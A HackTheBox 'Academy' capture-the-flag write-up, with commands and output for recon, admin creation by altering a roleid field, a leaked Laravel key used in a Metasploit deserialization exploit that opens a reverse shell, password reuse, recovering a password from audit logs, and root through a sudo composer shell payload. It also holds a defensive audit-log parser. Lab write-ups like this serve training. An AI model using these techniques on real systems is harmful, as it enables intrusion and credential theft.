HackTheBox - Academy write up
Academy is an Easy Linux box released on 7 November 2020.

Recon

Port scan:

$ nmap -A -p -1024 -oN scan.nmap 10.10.10.215

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only SSH on port 22 and an Apache web server on port 80 are open.

Web

Here is the Apache web page:

http://academy.htb/index.php

I intercept the request sent when we try to register a user.

We can see the username and password, but what is the roleid variable? If you change it to 1, you can create an admin user :)

While I was looking at the website, gobuster found several pages:

/index.php            (Status: 200) [Size: 2117]
/login.php            (Status: 200) [Size: 2627]
/register.php         (Status: 200) [Size: 3003]
/images               (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/admin.php            (Status: 200) [Size: 2633]
/home.php             (Status: 302) [Size: 55034] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 276]

Let's go to admin.php and log in with our admin user named toto. It works! Now we have this todo list:

We can see the last issue is still pending. Let's add the virtual host it mentions to /etc/hosts.

/etc/hosts:

10.10.10.215 academy.htb dev-staging-01.academy.htb

Let’s visit dev-staging-01.academy.htb.

This is a Laravel (PHP framework) app. Thanks to debug mode being enabled, the error page leaks the environment variables:

APP_NAME  "Laravel"
APP_KEY   "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG   "true"
DB_CONNECTION   "mysql"
DB_HOST   "127.0.0.1"
DB_PORT   "3306"
DB_DATABASE   "homestead"
DB_USERNAME   "homestead"
DB_PASSWORD   "secret"
BROADCAST_DRIVER  "log"

User #1

After some research, we find a Laravel exploit module in Metasploit. It needs the APP_KEY that the debug page leaked above.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
Module options (exploit/unix/http/laravel_token_unserialize_exec):
   Name       Current Setting                               Required
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no
   Proxies                                                  no
   RHOSTS     10.10.10.215                                  yes
   RPORT      80                                            yes
   SSL        false                                         no
   TARGETURI  /                                             yes
   VHOST      dev-staging-01.academy.htb                    no
...
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
[*] Started reverse TCP handler on 10.10.14.130:4444 
[*] Command shell session 2 opened (10.10.14.130:4444 -> 10.10.10.215:48794) at 2020-12-22 18:49:42 +0100
shell
[*] Trying to find binary(python) on target machine
[-] 
[*] Trying to find binary(python3) on target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /usr/bin/bash
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@academy:/var/www/html/htb-academy-dev-01/public$

We have a shell!

User #2

Time for privilege escalation (privesc)!

I found some passwords in the application source code, but they were not interesting; then I found this environment file:

www-data@academy:/var/www/html/academy$ cat .env
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

This password was reused by one of the users.

www-data@academy:/home$ su cry0l1t3
Password: mySup3rP4s5w0rd!!
$ bash
cry0l1t3@academy:/home$

Our user is in the adm group, so we can read all the log files in /var/log. Let's look for passwords:

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ grep -RE 'comm="su"|comm="sudo"' /var/log/ 2>/dev/null
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
$ aureport --tty
...
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
...
Notes:

1) The data field of a TTY audit record is the hex-encoded keystrokes: unhex(6D7262336E5F41634064336D79210A) = mrb3n_Ac@d3my! (the trailing 0A is the newline that aureport shows as <nl>).
2) aureport is a tool that produces summary reports of audit daemon logs; --tty reports on tty keystrokes.

We got mrb3n's password!
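Added example (not part of the original write-up): a small Python parser for the audit.log TTY records shown above. It decodes the hex data= field the way aureport --tty does and flags records where a password was typed, so an administrator can check whether tty auditing is leaking credentials into logs that group adm can read. The sample log lines are constructed from the record quoted above.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample in auditd's audit.log format: the "su mrb3n" command, the
# TTY record quoted in the write-up, and one unrelated record.
SAMPLE_LOG = """\
type=TTY msg=audit(1597199290.100:83): tty pid=2510 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_START msg=audit(1597199294.000:85): pid=2520 uid=1002 auid=0 ses=1 msg='op=PAM:session_open acct="mrb3n" res=success'
"""

# Programs that read a password from the tty: keystrokes recorded while one of
# these is in comm= are very likely a cleartext password.
PASSWORD_PROMPTERS = {"su", "sudo", "passwd", "ssh"}
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")


@dataclass
class TtyRecord:
    serial: int
    uid: int
    comm: str
    keystrokes: str  # decoded data= field; the trailing "\n" is what aureport shows as <nl>


def parse_tty_records(log_text: str) -> List[TtyRecord]:
    """Decode every type=TTY record in raw audit.log text."""
    records = []
    for line in log_text.splitlines():
        if not line.startswith("type=TTY "):
            continue
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        serial = int(SERIAL_RE.search(line).group(1))
        # data= is the hex-encoded keystroke buffer; latin-1 preserves control bytes
        keystrokes = bytes.fromhex(fields["data"]).decode("latin-1")
        records.append(TtyRecord(serial, int(fields["uid"]), fields["comm"], keystrokes))
    return records


def find_password_captures(log_text: str) -> List[TtyRecord]:
    """Return TTY records that most likely captured a password being typed.

    Any hit means tty auditing (normally pam_tty_audit with log_passwd) is
    writing secrets into a log that group adm can read: rotate the credential
    and remove log_passwd from the PAM configuration.
    """
    return [r for r in parse_tty_records(log_text)
            if r.comm in PASSWORD_PROMPTERS and r.keystrokes.strip()]
```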

Root

Time to get root!

mrb3n@academy:/dev/shm$ sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Thanks to GTFOBins, we know how to run shell commands with composer. Since we can run composer with sudo, we can run shell commands as root :)

mrb3n@academy:/dev/shm$ TF=$(mktemp -d)
mrb3n@academy:/dev/shm$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/dev/shm$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
474041e356040d30....

Rooted!
